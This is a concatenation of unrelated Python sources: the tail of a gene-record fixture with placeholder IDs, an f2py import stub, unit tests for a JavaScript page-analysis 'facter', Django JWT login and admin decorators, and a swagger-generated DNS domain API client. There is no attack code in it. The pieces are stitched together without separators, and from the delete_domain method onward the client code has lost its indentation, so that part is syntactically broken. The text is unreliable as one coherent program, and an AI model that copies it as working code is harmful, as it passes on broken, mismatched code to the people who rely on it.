"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0070",
},
"PIK3CA": {
"name": "PIK3CA",
"searchable_name": "pik3ca",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0071",
},
"SOD1": {
"name": "SOD1",
"searchable_name": "sod1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0072",
},
"IL17A": {
"name": "IL17A",
"searchable_name": "il17a",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0073",
},
"HLA-A": {
"name": "HLA-A",
"searchable_name": "hla-a",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0074",
},
"TLR2": {
"name": "TLR2",
"searchable_name": "tlr2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0075",
},
"CTLA4": {
"name": "CTLA4",
"searchable_name": "ctla4",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0076",
},
"F5": {
"name": "F5",
"searchable_name": "f5",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0077",
},
"HLA-DQB1": {
"name": "HLA-DQB1",
"searchable_name": "hla-dqb1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0078",
},
"HFE": {
"name": "HFE",
"searchable_name": "hfe",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0079",
},
},
}
"""
A Python module containing FORTRAN ports of some functions from "funcs" to be
called from Python using f2py.
"""
# Import sub-functions ...
from .f90 import f90
#!/usr/bin/python
# -*- coding: utf-8 -*-
import lxml.html
from mock import Mock, call
from preggy import expect
from holmes.config import Config
from holmes.reviewer import Reviewer
from holmes.facters.js import JSFacter
from tests.unit.base import FacterTestCase
from tests.fixtures import PageFactory
class TestJSFacter(FacterTestCase):

    def test_can_get_facts(self):
        page = PageFactory.create(url='http://my-site.com/')

        reviewer = Reviewer(
            api_url='http://localhost:2368',
            page_uuid=page.uuid,
            page_url=page.url,
            page_score=0.0,
            config=Config(),
            facters=[]
        )

        content = '<script type="text/javascript" src="teste.js"></script>'

        result = {
            'url': page.url,
            'status': 200,
            'content': content,
            'html': lxml.html.fromstring(content)
        }

        reviewer.responses[page.url] = result
        reviewer._wait_for_async_requests = Mock()
        reviewer.save_review = Mock()
        response = Mock(status_code=200, text=content, headers={})
        reviewer.content_loaded(page.url, response)

        facter = JSFacter(reviewer)
        facter.add_fact = Mock()
        facter.async_get = Mock()

        facter.get_facts()

        expect(facter.add_fact.call_args_list).to_include(
            call(
                key='page.js',
                value=set([]),
            ))

        expect(facter.add_fact.call_args_list).to_include(
            call(
                key='total.size.js',
                value=0,
            ))

        expect(facter.add_fact.call_args_list).to_include(
            call(
                key='total.size.js.gzipped',
                value=0,
            ))

        expect(facter.add_fact.call_args_list).to_include(
            call(
                key='total.requests.js',
                value=1,
            ))

        expect(facter.review.data).to_length(3)

        expect(facter.review.data).to_be_like({
            'total.size.js.gzipped': 0,
            'page.js': set([]),
            'total.size.js': 0
        })

        facter.async_get.assert_called_once_with(
            'http://my-site.com/teste.js',
            facter.handle_url_loaded
        )

    def test_handle_url_loaded(self):
        page = PageFactory.create()

        reviewer = Reviewer(
            api_url='http://localhost:2368',
            page_uuid=page.uuid,
            page_url=page.url,
            page_score=0.0,
            config=Config(),
            facters=[]
        )

        content = '<script type="text/javascript" src="teste.js"></script>'

        result = {
            'url': page.url,
            'status': 200,
            'content': content,
            'html': lxml.html.fromstring(content)
        }

        reviewer.responses[page.url] = result
        reviewer._wait_for_async_requests = Mock()
        reviewer.save_review = Mock()
        response = Mock(status_code=200, text=content, headers={})
        reviewer.content_loaded(page.url, response)

        facter = JSFacter(reviewer)
        facter.async_get = Mock()
        facter.get_facts()
        facter.handle_url_loaded(page.url, response)

        expect(facter.review.data).to_include('total.size.js')
        expect(facter.review.data['total.size.js']).to_equal(0.0537109375)

        expect(facter.review.data).to_include('total.size.js.gzipped')
        expect(facter.review.data['total.size.js.gzipped']).to_equal(0.05078125)

        expect(facter.review.data).to_include('page.js')
        data = set([(page.url, response)])
        expect(facter.review.data['page.js']).to_equal(data)

    def test_handle_url_loaded_with_empty_content(self):
        page = PageFactory.create()

        reviewer = Reviewer(
            api_url='http://localhost:2368',
            page_uuid=page.uuid,
            page_url=page.url,
            page_score=0.0,
            config=Config(),
            facters=[]
        )

        content = ''

        result = {
            'url': page.url,
            'status': 200,
            'content': content,
            'html': content
        }

        reviewer.responses[page.url] = result
        reviewer._wait_for_async_requests = Mock()
        reviewer.save_review = Mock()
        response = Mock(status_code=200, text=content, headers={})
        reviewer.content_loaded(page.url, response)

        facter = JSFacter(reviewer)
        facter.async_get = Mock()
        facter.get_facts()
        facter.handle_url_loaded(page.url, response)

        expect(facter.review.data).to_include('total.size.js')
        expect(facter.review.data['total.size.js']).to_equal(0)

        expect(facter.review.data).to_include('total.size.js.gzipped')
        expect(facter.review.data['total.size.js.gzipped']).to_equal(0)

    def test_can_get_fact_definitions(self):
        reviewer = Mock()
        facter = JSFacter(reviewer)

        definitions = facter.get_fact_definitions()

        expect(definitions).to_length(4)
        expect('page.js' in definitions).to_be_true()
        expect('total.size.js' in definitions).to_be_true()
        expect('total.size.js.gzipped' in definitions).to_be_true()
        expect('total.requests.js' in definitions).to_be_true()

    def test_invalid_url(self):
        page = PageFactory.create()

        reviewer = Reviewer(
            api_url='http://localhost:2368',
            page_uuid=page.uuid,
            page_url=page.url,
            page_score=0.0,
            config=Config(),
            facters=[]
        )

        content = '<html><link href="http://].js" /></html>'

        result = {
            'url': page.url,
            'status': 200,
            'content': content,
            'html': lxml.html.fromstring(content)
        }

        reviewer.responses[page.url] = result
        reviewer._wait_for_async_requests = Mock()
        reviewer.save_review = Mock()
        response = Mock(status_code=200, text=content, headers={})
        reviewer.content_loaded(page.url, response)

        facter = JSFacter(reviewer)
        facter.add_fact = Mock()
        facter.async_get = Mock()

        facter.get_facts()

        expect(facter.add_fact.call_args_list).to_include(
            call(
                key='page.js',
                value=set([]),
            ))

        expect(facter.add_fact.call_args_list).to_include(
            call(
                key='total.size.js',
                value=0,
            ))

        expect(facter.add_fact.call_args_list).to_include(
            call(
                key='total.size.js.gzipped',
                value=0,
            ))

        expect(facter.add_fact.call_args_list).to_include(
            call(
                key='total.requests.js',
                value=0,
            ))

        expect(facter.review.data).to_include('total.size.js')
        expect(facter.review.data['total.size.js']).to_equal(0)

        expect(facter.review.data).to_include('total.size.js.gzipped')
        expect(facter.review.data['total.size.js.gzipped']).to_equal(0)

        expect(facter.review.data).to_include('page.js')
        expect(facter.review.data['page.js']).to_equal(set([]))
import jwt
from django.http import JsonResponse
from django.conf import settings
from user.models import User
def login_check(func):
    def wrapper(self, request, *args, **kwargs):
        try:
            access_token = request.headers.get('Authorization', None)

            if not access_token:
                request.user = None
                return func(self, request, *args, **kwargs)

            payload = jwt.decode(access_token, settings.SECRET_KEY, settings.ALGORITHM)
            login_user = User.objects.get(id=payload['user_id'])
            request.user = login_user
            return func(self, request, *args, **kwargs)

        except jwt.DecodeError:
            return JsonResponse({'message': 'INVALID_TOKEN'}, status=400)

        except User.DoesNotExist:
            return JsonResponse({'message': 'INVALID_USER'}, status=401)

    return wrapper


def login_decorator(func):
    def wrapper(self, request, *args, **kwargs):
        if 'Authorization' not in request.headers:
            return JsonResponse({'message': 'NEED_LOGIN'}, status=401)

        try:
            access_token = request.headers['Authorization']
            payload = jwt.decode(access_token, settings.SECRET_KEY, settings.ALGORITHM)
            login_user = User.objects.get(id=payload['user_id'])
            request.user = login_user
            return func(self, request, *args, **kwargs)

        except jwt.DecodeError:
            return JsonResponse({'message': 'INVALID_TOKEN'}, status=401)

        except User.DoesNotExist:
            return JsonResponse({'message': 'INVALID_USER'}, status=401)

    return wrapper


def admin_decorator(func):
    def wrapper(self, request, *args, **kwargs):
        if 'Authorization' not in request.headers:
            return JsonResponse({'message': 'NEED_LOGIN'}, status=401)

        try:
            access_token = request.headers['Authorization']
            payload = jwt.decode(access_token, settings.SECRET_KEY, settings.ALGORITHM)
            login_user = User.objects.get(id=payload['user_id'])

            if not login_user.type.name == 'admin':
                return JsonResponse({'message': 'ACCESS_DENIED'}, status=401)

            request.user = login_user
            return func(self, request, *args, **kwargs)

        except jwt.DecodeError:
            return JsonResponse({'message': 'INVALID_TOKEN'}, status=401)

        except User.DoesNotExist:
            return JsonResponse({'message': 'INVALID_USER'}, status=401)

    return wrapper
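All three decorators above share one wrapper shape: read a token from the request headers, resolve it to a user, attach that user to the request, and short-circuit with an error response on failure. A dependency-free sketch of that shape (the dict-based `request`, the `tokens` table, and the error-dict return values are illustrative stand-ins for Django's request object, `jwt.decode`, the `User` model, and `JsonResponse`):

```python
def login_required(func):
    """Reject the call unless the request carries a known token."""
    tokens = {'token-1': 'alice'}  # stand-in for jwt.decode + User lookup

    def wrapper(request, *args, **kwargs):
        token = request.get('Authorization')
        if token is None:
            return {'message': 'NEED_LOGIN', 'status': 401}
        user = tokens.get(token)
        if user is None:
            return {'message': 'INVALID_USER', 'status': 401}
        request['user'] = user  # attach, like `request.user = login_user`
        return func(request, *args, **kwargs)
    return wrapper

@login_required
def view(request):
    return {'message': 'hello %s' % request['user'], 'status': 200}

assert view({'Authorization': 'token-1'})['status'] == 200
assert view({})['message'] == 'NEED_LOGIN'
assert view({'Authorization': 'bad'})['message'] == 'INVALID_USER'
```

`login_check` differs only in that a missing header falls through to the view with `request.user = None`, and `admin_decorator` adds one extra check on the resolved user's type.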
# coding: utf-8
"""
Selectel DNS API
Simple Selectel DNS API.
OpenAPI spec version: 1.0.0
Contact: info@mdsina.ru
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class DomainsApi(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client

    def add_domain(self, body, **kwargs):
        """
        Create new domain

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.add_domain(body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param NewDomain body: Domain info for creation (required)
        :return: Domain
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.add_domain_with_http_info(body, **kwargs)
        else:
            (data) = self.add_domain_with_http_info(body, **kwargs)
            return data

    def add_domain_with_http_info(self, body, **kwargs):
        """
        Create new domain

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.add_domain_with_http_info(body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param NewDomain body: Domain info for creation (required)
        :return: Domain
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method add_domain" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `add_domain`")

        collection_formats = {}

        resource_path = '/'.replace('{format}', 'json')
        path_params = {}

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='Domain',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
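The `add_domain`/`add_domain_with_http_info` pair above is the standard swagger-codegen dispatch: the public method normally blocks and returns the deserialized body, but when a `callback` keyword is supplied the underlying call runs asynchronously, the callback receives the response, and the caller gets the request thread back. A reduced sketch of that dispatch (the `fake_api_call` function and the thread handling are illustrative, not the generated client's real transport):

```python
import threading

def fake_api_call(payload):
    # Stand-in for ApiClient.call_api performing the HTTP request.
    return {'echo': payload}

def add_thing(payload, **kwargs):
    callback = kwargs.get('callback')
    if callback is None:
        # Synchronous path: block and hand back the response body.
        return fake_api_call(payload)
    # Asynchronous path: run the request in a thread, invoke the
    # callback with the response, and return the thread handle.
    thread = threading.Thread(target=lambda: callback(fake_api_call(payload)))
    thread.start()
    return thread

# Synchronous use returns data directly ...
assert add_thing({'name': 'x'}) == {'echo': {'name': 'x'}}

# ... while the callback form returns the running thread.
results = []
t = add_thing({'name': 'y'}, callback=results.append)
t.join()
assert results == [{'echo': {'name': 'y'}}]
```

The `_return_http_data_only`, `_preload_content`, and `_request_timeout` keywords seen in the generated code are passed through to the transport layer in the same way.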
    def delete_domain(self, domain_id, **kwargs):
        """
        Deletes a domain

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_domain(domain_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param int domain_id: ID of domain to delete (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.delete_domain_with_http_info(domain_id, **kwargs)
        else:
            (data) = self.delete_domain_with_http_info(domain_id, **kwargs)
            return data

    def delete_domain_with_http_info(self, domain_id, **kwargs):
        """
        Deletes a domain

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_domain_with_http_info(domain_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param int domain_id: ID of domain to delete (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['domain_id']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_domain" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'domain_id' is set
        if ('domain_id' not in params) or (params['domain_id'] is None):
            raise ValueError("Missing the required parameter `domain_id` when calling `delete_domain`")

        collection_formats = {}

        resource_path = '/{domain_id}'.replace('{format}', 'json')
        path_params = {}
        if 'domain_id' in params:
            path_params['domain_id'] = params['domain_id']

        query_params = {}

        header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_domain_by_id(self, domain_id, **kwargs):
"""
Find domain by ID
Returns a single domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domain_by_id(domain_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to return (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_domain_by_id_with_http_info(domain_id, **kwargs)
else:
(data) = self.get_domain_by_id_with_http_info(domain_id, **kwargs)
return data
def get_domain_by_id_with_http_info(self, domain_id, **kwargs):
"""
Find domain by ID
Returns a single domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domain_by_id_with_http_info(domain_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to return (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['domain_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_domain_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'domain_id' is set
if ('domain_id' not in params) or (params['domain_id'] is None):
raise ValueError("Missing the required parameter `domain_id` when calling `get_domain_by_id`")
collection_formats = {}
resource_path = '/{domain_id}'.replace('{format}', 'json')
path_params = {}
if 'domain_id' in params:
path_params['domain_id'] = params['domain_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Domain',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_domain_by_name(self, domain_name, **kwargs):
"""
Find domain by name
Returns a single domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domain_by_name(domain_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str domain_name: name of domain to return (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_domain_by_name_with_http_info(domain_name, **kwargs)
else:
(data) = self.get_domain_by_name_with_http_info(domain_name, **kwargs)
return data
def get_domain_by_name_with_http_info(self, domain_name, **kwargs):
"""
Find domain by name
Returns a single domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domain_by_name_with_http_info(domain_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str domain_name: name of domain to return (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['domain_name']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_domain_by_name" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'domain_name' is set
if ('domain_name' not in params) or (params['domain_name'] is None):
raise ValueError("Missing the required parameter `domain_name` when calling `get_domain_by_name`")
collection_formats = {}
resource_path = '/{domain_name}'.replace('{format}', 'json')
path_params = {}
if 'domain_name' in params:
path_params['domain_name'] = params['domain_name']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Domain',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_domain_zone_file(self, domain_id, **kwargs):
"""
Find domain by name
Returns a domain's zone file
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domain_zone_file(domain_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to delete (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_domain_zone_file_with_http_info(domain_id, **kwargs)
else:
(data) = self.get_domain_zone_file_with_http_info(domain_id, **kwargs)
return data
def get_domain_zone_file_with_http_info(self, domain_id, **kwargs):
"""
Find domain by name
Returns a domain's zone file
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domain_zone_file_with_http_info(domain_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to delete (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['domain_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_domain_zone_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'domain_id' is set
if ('domain_id' not in params) or (params['domain_id'] is None):
raise ValueError("Missing the required parameter `domain_id` when calling `get_domain_zone_file`")
collection_formats = {}
resource_path = '/{domain_id}/export'.replace('{format}', 'json')
path_params = {}
if 'domain_id' in params:
path_params['domain_id'] = params['domain_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_domains(self, **kwargs):
"""
Getting domains info
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domains(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[Domain]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_domains_with_http_info(**kwargs)
else:
(data) = self.get_domains_with_http_info(**kwargs)
return data
def get_domains_with_http_info(self, **kwargs):
"""
Getting domains info
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domains_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[Domain]
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_domains" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Domain]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_domain(self, domain_id, body, **kwargs):
"""
Updates a domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_domain(domain_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to update (required)
:param UpdatedDomain body: Domain info for update (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_domain_with_http_info(domain_id, body, **kwargs)
else:
(data) = self.update_domain_with_http_info(domain_id, body, **kwargs)
return data
def update_domain_with_http_info(self, domain_id, body, **kwargs):
"""
Updates a domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_domain_with_http_info(domain_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to update (required)
:param UpdatedDomain body: Domain info for update (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['domain_id', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_domain" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'domain_id' is set
if ('domain_id' not in params) or (params['domain_id'] is None):
raise ValueError("Missing the required parameter `domain_id` when calling `update_domain`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_domain`")
collection_formats = {}
resource_path = '/{domain_id}'.replace('{format}', 'json')
path_params = {}
if 'domain_id' in params:
path_params['domain_id'] = params['domain_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Domain',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
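Every generated method above pairs a plain wrapper with a `*_with_http_info` variant and dispatches on `callback`: with no callback the call blocks and returns the deserialized data; with a callback it returns the request thread, and the callback later receives the response. A minimal self-contained sketch of that dispatch convention (the names `call_api_sync_or_async` and `work` are illustrative, not part of the generated client):

```python
import threading

def call_api_sync_or_async(work, callback=None):
    """Mimic the generated client's dispatch: block and return data,
    or run the work in a thread, invoke the callback, and return the thread."""
    if callback:
        thread = threading.Thread(target=lambda: callback(work()))
        thread.start()
        return thread
    return work()

# Synchronous call: the data comes back directly.
assert call_api_sync_or_async(lambda: {"id": 1}) == {"id": 1}

# Asynchronous call: a thread comes back; the callback sees the response.
responses = []
thread = call_api_sync_or_async(lambda: {"id": 2}, callback=responses.append)
thread.join()
assert responses == [{"id": 2}]
```

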